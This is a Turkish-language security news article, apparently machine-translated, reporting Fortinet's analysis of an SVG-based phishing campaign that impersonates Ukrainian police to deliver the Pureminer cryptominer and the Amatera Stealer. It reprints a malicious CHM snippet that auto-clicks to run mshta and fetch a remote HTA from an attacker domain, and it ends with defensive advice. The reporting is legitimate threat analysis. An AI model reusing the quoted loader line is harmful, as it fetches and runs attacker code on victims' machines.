Pureminer kötü amaçlı yazılımları sunmak ve hassas bilgileri çalmak için SVG dosyalarını silahlandıran bilgisayar korsanları


Pureminer kötü amaçlı yazılımları sunmak ve hassas bilgileri çalmak için SVG dosyalarını silahlandıran bilgisayar korsanları

Son haftalarda, Pureminer Cryptominer’ı ve Amatera Stealer olarak adlandırılan bir veri çalma yükünü yaymak için tasarlanmış kötü amaçlı ölçeklenebilir vektör grafikleri (SVG) dosyalarıyla Ukrayna’daki organizasyonları hedefleyen sofistike bir kimlik avı kampanyası ortaya çıktı.

Saldırganlar Ukrayna polisi olarak maskelenerek, alıcıların bekleyen itirazları olduğunu iddia eden e -postalar gönderiyor.

Mağdurlar ekli SVG’yi açtıklarında, sonuçta sistem gizliliğini tehlikeye atan ve bilgi işlem kaynaklarını ele geçiren evraksız bir saldırı zincirini tetikler.

İlk enfeksiyon vektörleri olarak SVG eklerinin bu yeni kullanımı, saldırganların geleneksel e -posta filtrelerini ve uç nokta korumalarını atlamada artan yaratıcılığını göstermektedir.

SVG ekini açtıktan sonra, gömülü bir HTML iframe öğesi, saldırgan kontrollü bir alandan sessizce ikinci bir SVG yükler.

Bu SVG, aynı anda şifre korumalı bir arşiv indirirken, Ukrayna’da “Lütfen bekleyin, belgeniz yükleniyor…” mesajı ile sahte bir Adobe okuyucu arayüzü sunuyor.

google

Sahiplenmiş Adobe Reader Arayüzü (Kaynak – Fortinet)

Mağdurlara arşiv şifresi gösterilir ve derlenmiş bir HTML Yardım (CHM) dosyasını çıkarmaya çağırılır. Fortinet analistleri, kötü amaçlı yazılımların tespit etmek ve kurbanları kötü niyetli içerik yürütmeye teşvik etmek için bu aldatıcı kullanıcı etkileşimine olan güvenini kaydetti.

Arşivin içinde bir CHM dosyası, gizli modda bir HTML uygulaması (HTA) çağıran bir HTML kısayol nesnesi içerir.

CHM’den çıkarılan kötü amaçlı HTM dosyası (kaynak – fortinet)

Dize kodlama ve dizi karıştırma yoluyla gizlenen HTA komut dosyası, bir yükleyici görevi görür-saldırganın sunucusuna kalıcı bir bağlantı oluşturur, sistem bilgilerini Xorbase64 kodlu HTTP posta istekleri aracılığıyla püskürtür ve diğer komutları bekler.

SVG tabanlı filessiz bir zincirle pureminer enfeksiyon mekanizması

CHM’den çıkarılan kötü amaçlı HTM’den bir snippet, tıklama yönteminin mshta.exe’yi nasıl ortaya çıkardığını ve sonraki aşamalı yükü almak için nasıl gösterdiğini göstermektedir:-

[OBJECT id="shortcut" classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width="1" height="1"]
  [PARAM name="Command" value="ShortCut"]
  [PARAM name="Item1" value=",cmd,/c mshta https://ms-team-ping2.com/smtp_test.hta"]
[/OBJECT]
[SCRIPT]shortcut.Click();[/SCRIPT]

Enfeksiyon mekanizması iki farklı filulsuz yük teslimatı ile devam eder. Birincisi, ergosystem.zip adlı bir zip arşivi, işlem oyukunu kullanarak kötü niyetli bir DLL kenar yükleyen meşru bir .NET aracı içerir.

Saldırı Zinciri (Kaynak – Fortinet)

Pureminer olarak tanımlanan enjekte edilen yük, konfigürasyonunu protobuf serileştirilmiş bir blobdan çözer, AMD ve NVIDIA kütüphanelerini kullanarak donanım ayrıntılarını toplar ve CPU- veya GPU tabanlı madencilik modüllerini başlatır.

İkinci arşivde, bir Python tercümanı ve PythonMemoryModule SMTPB.ZIP, Amatera Stealer’ı doğrudan belleğe yüklemek için kaldırılır.

Bu stealer, HTTP GET aracılığıyla RC4 şifreli bir yapılandırma ister, bellekte kod çözer ve kimlik bilgilerini, tarayıcı artefaktlarını ve kripto para birimi cüzdan dosyalarını hasat etmek için direktifleri ayrıştırır.

İlk SVG dağıtımından çift yük uygulamasına kadar, bu kampanya, filessiz taktiklerin sorunsuz bir şekilde ilerlemesini ve meşru uygulama kötüye kullanımını örneklendirir.

Saldırganlar, SVG dosyalarını HTML sargıları olarak silahlandırarak ve CHM ve HTA aşamalarında zincirleyerek imza tabanlı savunmalardan kaçınır ve kullanıcıların ortak belge formatlarına olan güvenini kullanırlar.

Siber güvenlik ekipleri, CHM ve HTA uygulamalarının kısıtlanmasını sağlarken, SVG ataşmanlarını gömülü IFRAMS için incelemeli ve MSHTA.EXE çağrılarını izlemelidir.

Uç nokta davranışsal analitik ile birleştiğinde uygun URL filtreleme ve arşiv parola istemleri, veri tehlikeye atmadan veya sistem kaynaklarını ele geçirmeden önce bu enfeksiyon mekanizmasını bozabilir.

Daha fazla anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edinCSN’yi Google’da tercih edilen bir kaynak olarak ayarlayın.

GoogleNews



Source link